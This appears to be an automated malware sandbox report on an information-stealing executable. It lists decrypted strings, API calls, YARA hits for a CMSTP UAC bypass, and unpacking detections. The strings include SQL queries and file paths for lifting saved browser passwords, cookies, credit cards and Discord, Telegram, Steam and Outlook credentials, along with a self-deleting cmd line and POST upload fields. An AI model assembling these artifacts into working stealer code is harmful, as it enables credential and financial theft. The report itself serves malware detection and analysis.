                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: RmEndSession
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sqlite3_open
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sqlite3_prepare_v2
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sqlite3_step
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sqlite3_column_text
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sqlite3_finalize
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sqlite3_close
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sqlite3_column_bytes
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sqlite3_column_blob
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: encrypted_key
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PATH
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: NSS_Init
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: NSS_Shutdown
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PK11_GetInternalKeySlot
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PK11_FreeSlot
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PK11_Authenticate
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: PK11SDR_Decrypt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: C:\ProgramData\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: browser:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: profile:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: url:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: login:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: password:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Opera
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: OperaGX
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Network
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: cookies
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: .txt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: TRUE
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: FALSE
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: autofill
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SELECT name, value FROM autofill
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: history
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: name:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: month:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: year:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: card:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Cookies
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Login Data
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Web Data
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: History
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: logins.json
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: formSubmitURL
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: usernameField
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: encryptedUsername
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: encryptedPassword
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: guid
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: cookies.sqlite
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: formhistory.sqlite
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: places.sqlite
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: plugins
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Local Extension Settings
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Sync Extension Settings
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: IndexedDB
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Opera Stable
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Opera GX Stable
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: CURRENT
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: chrome-extension_
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: _0.indexeddb.leveldb
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Local State
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: profiles.ini
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: chrome
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: opera
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: firefox
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: wallets
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %08lX%04lX%lu
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ProductName
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ProcessorNameString
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: DisplayName
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: DisplayVersion
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Network Info:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - IP: IP?
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Country: ISO?
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: System Summary:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - HWID:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - OS:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Architecture:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - UserName:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Computer Name:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Local Time:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - UTC:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Language:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Keyboards:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Laptop:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Running Path:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - CPU:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Threads:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Cores:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - RAM:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - Display Resolution:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: - GPU:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: User Agents:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Installed Apps:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: All Users:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Current User:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Process List:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: system_info.txt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: freebl3.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: mozglue.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: msvcp140.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: nss3.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: softokn3.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: vcruntime140.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \Temp\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: .exe
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: runas
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: open
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: /c start
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %DESKTOP%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %APPDATA%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %LOCALAPPDATA%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %USERPROFILE%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %DOCUMENTS%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %PROGRAMFILES%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: %RECENT%
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: *.lnk
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: files
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \discord\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \Local Storage\leveldb
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \Telegram Desktop\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: key_datas
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: map*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: F8806DD0C461824F*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Telegram
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: *.tox
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: *.ini
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Password
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: 00000001
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: 00000002
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: 00000003
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: 00000004
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \Outlook\accounts.txt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Pidgin
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \.purple\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: accounts.xml
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: dQw4w9WgXcQ
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: token:
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Software\Valve\Steam
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: SteamPath
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \config\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ssfn*
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: config.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: DialogConfig.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: libraryfolders.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: loginusers.vdf
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \Steam\
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: sqlite3.dll
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: browsers
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: done
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: soft
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: \Discord\tokens.txt
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: https
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: POST
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: HTTP/1.1
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: hwid
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: build
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: token
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: file_name
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: file
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: message
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                            Source: 2.2.u3z0.0.exe.41c0e67.1.raw.unpackString decryptor: screenshot.jpg
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,2_2_00409540
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_004155A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_00406C10
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_004094A0
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,2_2_0040BF90
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeCode function: 2_2_6C756C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,2_2_6C756C80

                            Exploits

                            barindex
                            Yara detected UAC Bypass using CMSTP
                            Source: Yara matchFile source: 6.2.UniversalInstaller.exe.3bbe15b.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.UniversalInstaller.exe.34ec86d.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 21.2.cmd.exe.4dca976.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.UniversalInstaller.exe.373b15b.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.53ab264.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.UniversalInstaller.exe.3530d5b.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 21.2.cmd.exe.4e0ee64.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.UniversalInstaller.exe.373bd5b.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 5.2.UniversalInstaller.exe.353015b.3.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 21.2.cmd.exe.4e0e264.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 20.2.UniversalInstaller.exe.36f786d.7.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.UniversalInstaller.exe.3bbed5b.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.5367976.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 7.2.cmd.exe.53abe64.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 6.2.UniversalInstaller.exe.3b7a86d.5.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000015.00000002.2752594150.0000000004DC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000014.00000002.2531256823.00000000036F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: UniversalInstaller.exe PID: 6532, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: UniversalInstaller.exe PID: 7120, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 4456, type: MEMORYSTR

                            Compliance

                            barindex
                            Detected unpacking (overwrites its own PE header)
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeUnpacked PE file: 0.2.4BfhCycV4B.exe.400000.0.unpack
                            Source: C:\Users\user\AppData\Local\Temp\u3z0.0.exeUnpacked PE file: 2.2.u3z0.0.exe.400000.0.unpack
                            Source: 4BfhCycV4B.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49716 version: TLS 1.0
                            Source: C:\Users\user\Desktop\4BfhCycV4B.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                            Source: unknownHTTPS traffic detected: 185.93.1.244:443 -> 192.168.2.5:49726 version: TLS 1.2
                            Source: Binary string: mozglue.pdbP source: u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                            Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: nss3.pdb@ source: u3z0.0.exe, 00000002.00000002.2468742808.000000006C97F000.00000002.00000001.01000000.00000008.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Branding\obj\Release\Branding.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3303896392.0000013E35A30000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3304143080.0000013E35A40000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerCommon\obj\Release\InstallerCommon.pdb4 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3304143080.0000013E35A40000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: wntdll.pdbUGP source: Qg_Appv5.exe, 00000004.00000002.2304402051.0000000005370000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2302387380.0000000005019000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244478392.000000000361C000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244765590.0000000003970000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308649628.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308799655.0000000004100000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2309045975.00000000045B6000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2529875595.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530363582.0000000005490000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.2752444597.0000000004A17000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: Qg_Appv5.exe, 00000004.00000002.2304402051.0000000005370000.00000004.00000800.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2302387380.0000000005019000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244478392.000000000361C000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244765590.0000000003970000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308649628.0000000003DA5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308799655.0000000004100000.00000004.00000800.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2309045975.00000000045B6000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2529875595.0000000004FB7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530363582.0000000005490000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000015.00000002.2752444597.0000000004A17000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: mozglue.pdb source: u3z0.0.exe, 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
